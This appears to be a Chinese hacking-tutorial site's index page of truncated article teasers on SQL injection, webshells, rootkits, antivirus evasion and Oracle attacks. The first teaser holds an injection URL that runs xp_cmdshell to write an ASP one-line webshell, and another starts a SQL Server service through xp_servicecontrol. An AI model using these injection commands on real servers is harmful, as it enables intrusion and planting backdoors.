ASP注入详细命令40条

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript r
收藏 0 赞 0 分享

实例讲解Cookies欺骗与session欺骗入侵

我们先来说下基础知识,免的一些菜鸟看不懂,有借鉴. cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录。   那么什么是cookies呢,我这里给大家一个专业的解释,cookies是一个
收藏 0 赞 0 分享

菜鸟要了解的三种后门技术安全知识

曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们也不用提心吊胆上网了…… 可是后门会因此罢休
收藏 0 赞 0 分享

Rootkit技术之内核钩子原理

我们知道,应用程序总是离不开系统内核所提供的服务,比如它要使用内存的时候,只要跟操作系统申请就行了,而不用自己操心哪里有空闲的内存空间等问题,实际上,这些问题是由操作系统的内核来代劳的。站在黑客的角度讲,如果能够控制内核,实际上就是控制了内核之上的
收藏 0 赞 0 分享

详述入侵渗透技术

入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。 一,踩点 踩点可以了解目标主机和网络的一些基本的安全信息,主要有; 1,管理员联系信息,电话号,传真号; 2,IP地址范围; 3,DNS服务器;
收藏 0 赞 0 分享

MYSQL注入获取web路径的几个方法

我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了!针对这种情况,我介绍三种方法!load_file(char(47))查找部分*nix系统的目录。 a. 原理 由于load_
收藏 0 赞 0 分享

远程包含和本地包含漏洞的原理

首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi
收藏 0 赞 0 分享

vbs搜索文件名或者得到目录列表

'把网上的一个小程序改得方便了点,这个搜索次效率很好。 on error resume next Dim keyWord, DirTotal, TimeSpend, FileTotal, Fso, outFile, txtResult, txtPath, sPa
收藏 0 赞 0 分享

教菜鸟如何手动修复引入表

手工修复引入表是破解加壳软件最难的一道工序,一向是顶尖高手的专利,令我等菜鸟往往望而却步,而不敢奢望越雷池半步!那么有没有简单一些的方法呢?通过本人的实践,终于找到了这条捷径。我的做法可以分为以下几步: 1、确定程序的OEP,并脱壳。 2、
收藏 0 赞 0 分享

SOCKCAP代理的设置方法(图)

1.安装完软件,打开后: 2.按照图中点选正确的设置,填写上你自己找到的代理IP地址,端口,或者帐号和密码: 3.(这一步看情况定:有的代理不要帐号密码)按照上图设置完后,点击“确定”完会弹出框框让您输入帐号和密码:
收藏 0 赞 0 分享

关于简单的php源代码泄露漏洞的发掘

我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之
收藏 0 赞 0 分享

Informix注入整理

前些时间做一个渗透测试,数据库是informix的。整理了一下。 informix数据类型比较复杂,在union查询中最郁闷的就是匹配字段的问题 数据类型如下 informix的字段类型 char(size) varchar(size)
收藏 0 赞 0 分享

DoS拒绝服务攻击工具基本技术及其发展方向

DoS:我们所说的DoS (Denial of Service)攻击其中文含义是拒绝服务攻击,这种攻击行动使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷以至于瘫痪而停止提供正常的网络服务。黑客不正当地采用标准协议或连接方法,向攻击的服务发出大
收藏 0 赞 0 分享

一次SA权限入侵和小议SA提权

来自草哲的blog 尝试在NB里面恢复CMDSHELL、OACREAT都没有成功,所以开启SQLSERVERAGENT ;exec master.dbo.xp_servicecontrol 'start','SQLSERVE
收藏 0 赞 0 分享

突破机房权限限制 让自己为所欲为(图)

期中考试又快到了,笔者和其他同学一样,都处在一个紧张的复习状态里,简直要崩溃了。为了缓解学习上的压力,想在机房里安装几个黑软玩玩,可不巧的是做了很多限制,只能浏览一些简单的网页。另外对于从网上下载的普通程序,也是无法运行的,于是决定对其权限限制实施破解
收藏 0 赞 0 分享

分析黑客是如何破坏杀毒软件的

最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是什么“刺瞎”了杀毒软件的双眼。   黑客姓名:于谦
收藏 0 赞 0 分享

分享木马的免杀技术经验

木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. 以下讲解都是以远程控制软件为例(这里补充一个概念,木马的反弹技术,就是服务端主
收藏 0 赞 0 分享

简介六大数据库攻击手段

普通的黑客从进入到退出一次数据攻击只需用不到10秒钟时间就可完成,这个时间对于数据库管理员来说即使注意到入侵者都几乎不够。因此,在数据被损害很长时间之前,许多数据库攻击都没有被单位注意到。   令人奇怪的是,根据许多专家的介绍,作为企业之“王冠”的大
收藏 0 赞 0 分享

入侵实例看视频服务器安全部署策略

视频服务器都会提供大量的视频资源,大部分都提供了在线观看以及下载服务。对于流量要求比较高,而从服务器本身的部署来看,也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。 寻找漏洞 我们找到一个目标。首先用工具扫描了一下,
收藏 0 赞 0 分享

针对Oracle的TNS listener的攻击方法

首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,se
收藏 0 赞 0 分享